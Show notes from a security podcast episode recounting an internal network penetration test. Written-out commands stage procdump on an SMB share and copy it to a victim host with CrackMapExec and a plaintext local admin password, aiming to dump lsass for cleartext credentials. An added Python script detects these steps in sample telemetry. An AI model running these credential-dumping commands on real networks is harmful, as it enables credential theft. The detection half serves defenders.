7MS #383: Tales of Internal Network Pentest Pwnage - Part 10 - a podcast by Brian Johnson
from 2019-10-01T18:23:46
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."
- Relayed one high-priv cred from one box to another
- Dumped and cracked a local machine's hash
- Passed that hash around the network
- Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
- Set the wdigest flag via CrackMapExec
Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:
mkdir /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share
Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, retrieve it, then delete procdump.exe:
crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'
(more on today's episode show notes)
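From the blue-team side, each step in this sequence leaves distinct host telemetry: a registry write to the WDigest UseLogonCredential value, an executable dropped into C:\Users\Public, and a non-system process opening lsass.exe with memory-read rights. The script below is an added example (not from the episode or the CrackMapExec/Impacket projects) that runs three such checks over a handful of constructed Sysmon-style events; the event fields, the sample records and the allowlist of processes that legitimately touch lsass are assumptions to be tuned per environment.

```python
"""Simple detections for the procdump/lsass and WDigest steps described above.

Added example; the events below are constructed, not captured from a real host.
Each record loosely mirrors a Sysmon event: 10 = ProcessAccess, 11 = FileCreate,
13 = RegistryEvent (value set).
"""

# Constructed sample telemetry (assumption: field names and values are illustrative).
SAMPLE_EVENTS = [
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "details": "DWORD (0x00000001)"},
    {"id": 11, "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\Public\procdump64.exe"},
    {"id": 10, "image": r"C:\Users\Public\procdump64.exe",
     "target": r"C:\Windows\system32\lsass.exe", "access": "0x1FFFFF"},
    # Benign: a core system process is expected to hold handles to lsass.
    {"id": 10, "image": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\system32\lsass.exe", "access": "0x1FFFFF"},
    # Benign: ordinary user file write outside the Public folder.
    {"id": 11, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Documents\notes.txt"},
]

# PROCESS_VM_READ is the right needed to read another process's memory; a dump
# tool must request it (PROCESS_ALL_ACCESS 0x1FFFFF includes it).
PROCESS_VM_READ = 0x0010

# Processes that legitimately open lsass on a default install. Assumption:
# this list must be tuned per environment (EDR agents, backup tools, etc.).
LSASS_ALLOWLIST = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\svchost.exe",
    "c:\\windows\\system32\\wmiprvse.exe",
}


def detect(events):
    """Return a list of (finding, subject) tuples for suspicious events."""
    findings = []
    for ev in events:
        image = ev.get("image", "").lower()
        target = ev.get("target", "").lower()

        # 1. WDigest cleartext caching switched on (UseLogonCredential = 1).
        if (ev["id"] == 13
                and target.endswith("\\wdigest\\uselogoncredential")
                and "0x00000001" in ev.get("details", "")):
            findings.append(("wdigest_enabled", image))

        # 2. Executable content written to the world-writable Public folder.
        elif (ev["id"] == 11
                and target.startswith("c:\\users\\public\\")
                and target.endswith((".exe", ".dll"))):
            findings.append(("exe_dropped_in_public", target))

        # 3. Non-allowlisted process opening lsass with memory-read rights.
        elif ev["id"] == 10 and target.endswith("\\lsass.exe"):
            mask = int(ev.get("access", "0"), 16)
            if (mask & PROCESS_VM_READ) and image not in LSASS_ALLOWLIST:
                findings.append(("lsass_memory_access", image))
    return findings


if __name__ == "__main__":
    for kind, subject in detect(SAMPLE_EVENTS):
        print(f"{kind}: {subject}")
```

Run against the constructed events, the three attacker steps each produce one finding while the two benign records are ignored. The lsass check keys on the access mask rather than the tool name, so renaming procdump64.exe does not help; the allowlist is the part that needs local tuning, since EDR and backup agents also open lsass legitimately.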